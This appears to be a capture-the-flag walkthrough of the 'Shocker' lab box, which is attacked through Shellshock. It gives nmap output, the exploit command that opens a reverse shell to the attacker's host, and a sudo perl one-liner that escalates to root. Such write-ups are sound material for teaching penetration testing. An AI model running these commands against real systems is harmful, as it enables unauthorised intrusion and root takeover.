1 nmap -sC -sV -oA nmap -v 10.10.10.56
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-21 16:04 EDT NSE: Loaded 151 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 16:04 Completed NSE at 16:04, 0.00s elapsed Initiating NSE at 16:04 Completed NSE at 16:04, 0.00s elapsed Initiating NSE at 16:04 Completed NSE at 16:04, 0.00s elapsed Initiating Parallel DNS resolution of 1 host. at 16:04 Completed Parallel DNS resolution of 1 host. at 16:04, 0.01s elapsed Initiating Connect Scan at 16:04 Scanning 10.10.10.56 [1000 ports] Discovered open port 80/tcp on 10.10.10.56 Discovered open port 2222/tcp on 10.10.10.56 Completed Connect Scan at 16:04, 0.42s elapsed (1000 total ports) Initiating Service scan at 16:04 Scanning 2 services on 10.10.10.56 Completed Service scan at 16:04, 6.05s elapsed (2 services on 1 host) NSE: Script scanning 10.10.10.56. Initiating NSE at 16:04 Completed NSE at 16:04, 0.89s elapsed Initiating NSE at 16:04 Completed NSE at 16:04, 0.11s elapsed Initiating NSE at 16:04 Completed NSE at 16:04, 0.00s elapsed Nmap scan report for 10.10.10.56 Host is up (0.028s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: POST OPTIONS GET HEAD |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA) | 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA) |_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel NSE: Script Post-scanning. Initiating NSE at 16:04 Completed NSE at 16:04, 0.00s elapsed Initiating NSE at 16:04 Completed NSE at 16:04, 0.00s elapsed Initiating NSE at 16:04 Completed NSE at 16:04, 0.00s elapsed Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
From our scan we have see we have the below services available.
First taking a look at the HTTP server we find a basic page. The source of the page doesn’t reveal anything.
dirbuster with a standard wordlist we find a
cgi-bin folder. Given the name of the box is shocker we can assume the attack is a Shellshock attack.
Using dirbuster again we can fuzz for
After a few seconds we find a
The exploit for this box is the well known
Apache mod_cgi - 'Shellshock' Remote Command Injection exploit.
The syntax for executing the PoC is
python 34900.py payload=reverse rhost=10.10.10.56 lhost=10.10.14.16 lport=4555 pages=/cgi-bin/user.sh
payloadCan be either a reverse or bind shell
rhostThe IP/hostname of the server
lhostThe IP of our system
lportThe port where the shell will establish connection
pagesThe URL to the
Executing this will immediately grant us shell access as the user
shelly and the
user.txt file can be found at
Now that we have shell as a user our task is to escalate our privileges to root. By running
sudo -l we find that we have permissions to run
sudo /usr/bin/perl as root with no password.
This can easily be exploited as perl can execute other programs. By running
sudo /usr/bin/perl -e 'exec "/bin/bash";' we now have a
bash session as root and can find the
root.txt file in